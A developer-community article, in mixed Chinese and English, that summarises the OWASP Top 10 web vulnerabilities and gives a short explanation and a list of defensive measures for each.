常见TOP 10 web漏洞英文总结（TOP 10 web vulnerabilities introduce）-摩杜云开发者社区

1、注入(inject)

（1）The concept of injection

Injection generally refers to injection flaws such as SQL injection, OS injection, and LDAP injection when untrusted data is sent to the parser as part of a command or query. An attacker's malicious data can trick a parser into executing unintended commands or accessing data without proper authorization.

https://t.zsxq.com/13jkeXo1n 中英文对照详细出处

（2）注入的分类(Injected classification)

Usually injected with SQL injection and OS (Operating System) injection SQL injection: It is to insert SQL commands into the web form to submit or enter the query string of domain name or page request, and finally trick the server into executing malicious SQL commands. Specifically, it is the ability to use existing applications to inject (malicious) SQL commands into the background database engine for execution, which can obtain a database on a website with security vulnerabilities by entering (malicious) SQL statements into a web form, rather than executing SQL statements as the designer intended.

Defense for SQL injection:

1: Strictly escape and filter the input.

2: The data type is strictly defined, and the data length is strictly defined.

3: Enable the policy to prevent SQL injection through the WAF device.

4: Strictly restrict the website's access to the database.

OS injection: Most of the programming languages used in web development can execute OS (operating system) commands through the shell. When executing OS commands through the shell, or when a method used in development makes internal use of the shell, it is possible that OS commands may be arbitrarily executed. This phenomenon is known as OS command injection.

os注入的防御：（Defense for QS injection）

1: Use safe functions to escape the parameters passed to the OS command.

2: Do not pass externally entered strings to command line arguments.

3: Select the implementation method that does not invoke OS commands.

Not calling the function of using the shell can not only eliminate the possibility of OS command injection leakage mixing, but also eliminate the system overhead of calling OS commands, which can improve the performance of the application in many aspects.

2、敏感数据泄露（Sensitive data leakage）

（1）介绍（introduce）

In recent years, sensitive data leakage has become one of the most common and influential attacks, generally our sensitive information includes passwords, financial data, medical data, etc., because web applications or APIs are not encrypted or improper protection of sensitive data, these data are easily exploited by attackers, attackers may use these data to carry out some crimes, therefore, unencrypted information is very easy to be damaged and exploited, not long ago it was revealed that Facebook leaked a large amount of information about users. and 12306 has also leaked users' information many times. Now that information leakage has become one of the top three vulnerabilities in the OWASP Top 10, it is conceivable that sensitive information leakage has now become a very serious problem.

（2）防御（defense）

1: Classify the data processed, stored or transmitted by the system, and access control according to the classification.

2: Encrypt and store important data, and use ciphertext to transmit data during transmission.

3: Clean up useless sensitive data in time, and only use specified users to access sensitive data.

3、失效的身份认证（Invalid authentication）

（1）介绍（introduce）

ement capabilities, attackers can decipher passwords, keys, or session tokens, or temporarily or permanently impersonate the identity of another user.

Identity authentication: Identity authentication is most commonly used for system login, the form is generally a login method of username and password, and in the case of high security requirements, there are verification codes, client certificates, Ukey, etc.

Session management: HTTP uses the session mechanism to achieve authentication, the result of HTTP authentication is often to obtain a token and put it in a cookie, and then the identity only needs to read the authorization token, if the authorization token authentication is successful, then there is no need to log in again.

（2）防御（defense）

method to defend against dead identities and session management

1: Distinguish between public and restricted areas: The public areas of the site allow anonymous users to access, but restricted areas of the site are accessible only to specified users.

2: Support the validity period of the password: Provide users with the ability to change the password after a certain period of time.

3: Ability to disable accounts: Accounts can be disabled after receiving an attack to avoid further losses.

4: Require users to use strong passwords.

5: Do not transmit usernames and passwords in plain text on the network: use SSL to encrypt data streams, and you can also encrypt cookies.

4、跨站脚本（Cross-site scripting）

（1）介绍(introduce)

Cross-site scripting attack XSS (Cross Site Scripting), in order not to be confused with the abbreviation Cascading Style Sheets (Cascading Style Sheets), so cross-site scripting attack is abbreviated to XSS. A malicious attacker inserts malicious script code into a Web page, and when a user browses the page, the script code embedded in the Web will be executed, thereby achieving the purpose of maliciously attacking the user. XSS attacks target user-level attacks!

（2）分类(classify)

XSS is divided into three categories: reflected XSS, stored XSS, and DOM XSS

（3）原理(principle)

Stored XSS: Stored XSS, persistence, code is stored in the server, such as in personal information or published articles, etc., insert code, if there is no filtering or filtering is not strict, then these codes will be stored in the server, when the user visits the page triggers code execution. This XSS is more dangerous and easy to cause worms and steal cookies.

Reflected XSS: Non-persistent, you need to trick users into clicking on links to trigger XSS code (there are no such pages and content in the server), and it is generally easy to appear on search pages.

DOM XSS: Without going through the backend, the DOM-XSS vulnerability is a document Objeet Model (DOM)-based vulnerability in which an attacker sends a request with malicious JS code to the server, and the server's response does not contain the attacker's script in any form. When the user's browser processes this response, the DOM object processes the XSS code, resulting in an XSS vulnerability.

（4）防御(defense)

1: Storage type: Write filters in the background to escape some html tags and special characters.

2: Reflective: Escape of special characters.

3: DOM type: Check whether it contains some special functions that can cause harm.

4: For the defense of XSS intercepting cookies, you can add HttpOnly on the cookie.

5、外部实体(External Entity)

（1）介绍(introduce)

XXE (XML External Entity Injection) External Entity Injection vulnerability, when XML refers to external entities, attackers can construct malicious XML code to cause arbitrary file reading, command execution and even interrupt the server.

XML is used to identify electronic files so that it has a structural identification language, which can be used to mark data, define data types, and is a source language that allows users to define their own markup language. XML document structure includes XML reputation, DTD document type definition, document elements.

（2）防御(defense)

1: Use the method provided by the development language to disable external entities.

2: Filter user-submitted XML data.

6、安全配置错误(Security misconfiguration)

（1）介绍(introduce)

Security misconfiguration is a relatively common vulnerability, due to improper configuration of the operator (default configuration, temporary configuration, open source cloud storage, HTTP header configuration, and detailed errors containing sensitive information), so that attackers can use these configurations to obtain higher privileges, security configuration errors can occur at all levels, including platforms, web servers, application servers, databases, schemas, and code.

（2）防御(defense)

1: The services used do not contain any unnecessary features, components, documentation, and samples, and remove or do not install features and frameworks that do not apply.

2: Timely detect the system service version and patch the discovered vulnerabilities.

3: When assigning permissions to files, etc., adopt the approach of least privilege principle according to the needs of their work.

4: Automated installation and deployment.

5: Implement vulnerability scanning and security auditing.

7、失效的访问控制(Invalid access control)

（1）介绍(introduce)

Access control: that is, to protect resources from illegal access and use, the most widely used role-based access control mechanism. Invalid access control is when an attacker elevates his or her privileges by various means, bypassing access control, and invalidating access control so that the attacker can impersonate a user, administrator, or privileged user, or create, access, update, or delete any record.

（2）防御(defense)

1: Resources other than public resources are denied access by default.

2: Use one-time access control mechanisms and continuously reuse them throughout your application.

3: Establish an access control model to enforce ownership of records, rather than accepting any records created, read, updated, or deleted by the user.

4: The JWT token on the server should be invalidated after the user logs out.

8、不安全的反序列化(Unsafe deserialization)

（1）介绍(introduce)

Serialization: Serialization is the process of converting state information about an object into a form that can be stored or transmitted, usually in binary form.

Deserialization: The exact opposite of the process of serialization.

（2）原理(principle)

Serialization is to convert an object into a byte stream, stored in memory, file database, and deserialization is to convert a byte stream into an object. In java there is a writeobject method of the ObjectOutputStream class that can be serialized, and a Readobject method of the ObjectInputStream class that can be deserialized. The vulnerability is due to the fact that if an application deserializes maliciously crafted user-entered data, an unintended object may be generated, potentially resulting in remote code execution. Or if there are classes in the application that can change behavior during or after deserialization, the attacker can change the application logic or implement remote code execution attacks. We call this object and data structure attacks.

（3）防御(defense)

1: The safest approach is not to accept serialized objects from untrusted sources, or to use serialized media that allows only primitive data types.

2: Before deserialization, perform strict data type verification. Since verification rules are easy to be explored by attackers and then easily bypassed, defense cannot rely on this method alone, but can be used as a supplement to the integrity verification defense scheme.

3: Isolate code that is deserialized in a low-privilege environment.

4: Exhaustive logging of the deserialization process, monitoring the deserialization process, and alerting when suspected deserialization attacks are found.

9、使用含有已知漏洞的组件(Use components with known vulnerabilities)

（1）介绍(introduce)

Since today's servers use many components, components (such as libraries, frameworks, and other software modules) run with the same permissions as applications. If a component with known vulnerabilities is used, such an attack can result in severe data loss or server takeover. Using applications and APIs with components with known vulnerabilities can disrupt application defenses, cause various attacks, and have serious impacts.

（2）防御(defense)

1: Identify the components and versions in use, including all dependencies.

2: Update the component or referenced library file to the latest.

3: Establish security policies to manage the use of components.

10、不足的日志记录和监控(Inadequate logging and monitoring)

（1）介绍(introduce)

Inadequate logging and monitoring, as well as loss or ineffectiveness of incident response integration, allow attackers to further attack systems, maintain continuity, or pivot to more systems, and tamper, extract, or destroy data. Most defect studies show that defects are detected for more than 200 days and are usually detected by external inspectors rather than through internal processes or monitoring.

Logging: Logging is one of the most important features of a system. Logging includes login success records, login failure records, access control records, etc., which are used to record various information of the server.

（2）防御(defense)

1: Ensure that all logins, access control failures, and input verification failures can be logged, and retain enough user context information to identify suspicious or malicious accounts and allow enough time for later forensics.

2: Establish an effective monitoring and alerting mechanism to enable suspicious activities to be detected and responded to within an acceptable time.

3: Improve the log system so that it can monitor various log information.

4: Back up the log system in time and store it for a long enough time.